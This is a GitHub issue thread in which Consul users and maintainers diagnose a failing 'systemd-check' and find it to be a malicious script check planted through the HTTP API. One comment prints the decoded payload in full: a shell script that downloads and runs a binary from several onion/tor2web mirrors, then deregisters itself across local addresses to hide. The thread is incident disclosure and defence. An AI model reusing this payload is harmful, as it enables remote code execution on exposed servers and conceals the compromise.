systemd-check timeout
#4931
Comments
|
you registered a check without HTTP ? something like |
|
my error log is: and this is my command starting consul: |
|
@YQyangqian what is the definition of this healthcheck? Is systems properly working on this machine? |
|
in my /data/apps/consul/conf director, file toutiao-worker-job-elasticjob.json is as below: |
|
Well, it seems you shell script is taking more than 10s to execute, but without the content of this script, hard to tell why |
|
more error log here: 2018/11/09 16:31:08 [WARN] agent: check "systemd-check" has the 'script' field, which has been deprecated and replaced with the 'args' field. See https://www.consul.io/docs/agent/checks.html |
|
@YQyangqian huh... fun, you probably have the issue #4903 Is you service registered using config file or an HTTP registration? can you dump the content of /var/lib/consul/checks ? |
|
that is what /var/lib/consul/checks likes ....... |
|
Here you are... there is a huge payload in your script, but since you sent a capture, I cannot decrypt it, but basically, you have a weird check there. Probably linked to #4903 |
|
Thanks that solved. this weird check look like: |
|
@YQyangqian you should contact your security team and send an email to security@hashicorp.com |
|
You should use the new option: enable_local_script_checks we added recently #4715 (Consul 1.3.0+) and vote for this if you need registration of scripts using HTTP API: #4719 (we are using this on our patched Consul instances in all of our DCs) |
|
Thanks a lot. |
|
Any thing update? We also met this issue... |
|
Consul 0.8.4 It's an attack? the script u pasted decoded as below: exec &>/dev/null
export PATH=$PATH:/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin
function systemd() {
if [ ! -f "/tmp/.X1-unix" ]; then
x=/var/tmp/systemd-check
y=.systemd-check
wget -qU- http://malwrekbgzavkdp5.onion.in.net/$y -O$x || curl -skL -A- http://malwrekbgzavkdp5.onion.in.net/$y -o$x ||
wget -qU- http://malwrekbgzavkdp5.tor2web.me/$y -O$x || curl -skL -A- http://malwrekbgzavkdp5.tor2web.me/$y -o$x ||
wget -qU- http://malwrekbgzavkdp5.onion.nz/$y -O$x || curl -skL -A- http://malwrekbgzavkdp5.onion.nz/$y -o$x ||
wget -qU- http://malwrekbgzavkdp5.onion.ws/$y -O$x || curl -skL -A- http://malwrekbgzavkdp5.onion.ws/$y -o$x ||
wget -qU- https://malwrekbgzavkdp5.onion.pet/$y -O$x || curl -skL -A- https://malwrekbgzavkdp5.onion.pet/$y -o$x ||
wget -qU- https://malwrekbgzavkdp5.tor2web.io/$y -O$x || curl -skL -A- https://malwrekbgzavkdp5.tor2web.io/$y -o$x
chmod +x $x;$x;rm -f $x
fi
}
function dereg() {
ips=$(echo localhost; echo 127.0.0.1;hostname -i;ip a |grep "inet "|awk {'print $2'}|cut -d '/' -f 1;ifconfig |grep "inet "|awk {'print $2'})
for i in $ips ;do curl -X PUT http://$i:8500/v1/agent/check/deregister/systemd-check;done
for i in $ips ;do wget -qO- --method=PUT http://$i:8500/v1/agent/check/deregister/systemd-check;done
}
systemd
dereg |
|
@sunadm #4931 (comment) I can tell you the same thing as Contact your security team, security@hashicorp.om and vote for #4719 :-) |
|
For future readers of this issue, we believe the behavior described above is caused by a malicious payload that has gained access to the Consul cluster as detailed in this blog post. We recommend not publicly reporting similar cases until you’ve followed the remediation steps and performed your own analysis of the incident. To help protect the community from disclosing that their installations may be vulnerable I’m going to lock this issue. If you have a different non-security related issue, please open a new issue. If you believe you are seeing new behavior in the attack please report it to security@hashicorp.com. |
today two of my server having some problems with an
systemd-checkerror,version
1.2.0/1.3.0what could possibly cause this error?
and how to fix it?
and syslog has many output log like
The text was updated successfully, but these errors were encountered: